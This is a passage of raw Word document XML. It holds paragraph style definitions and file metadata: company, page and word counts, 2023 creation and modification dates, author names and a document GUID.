    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat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customStyle="1" w:styleId="31">
    <w:name w:val="_Style 30"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat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numbering" Target="numbering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BB81A-5CB9-4081-9A65-DB48B4BF3B2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WHU</Company>
  <Pages>4</Pages>
  <Words>167</Words>
  <Characters>953</Characters>
  <Lines>7</Lines>
  <Paragraphs>2</Paragraphs>
  <TotalTime>2</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1118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2023-11-08T11:18:00Z</dcterms:created>
  <dc:creator>sidelau;Guojun Peng</dc:creator>
  <cp:lastModifiedBy>过客</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-29T02:56:17Z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E48B0BDCA5CC415F8BD8DB803EA939AC_13</vt:lpwstr>
  </property>
</Properties>
</file>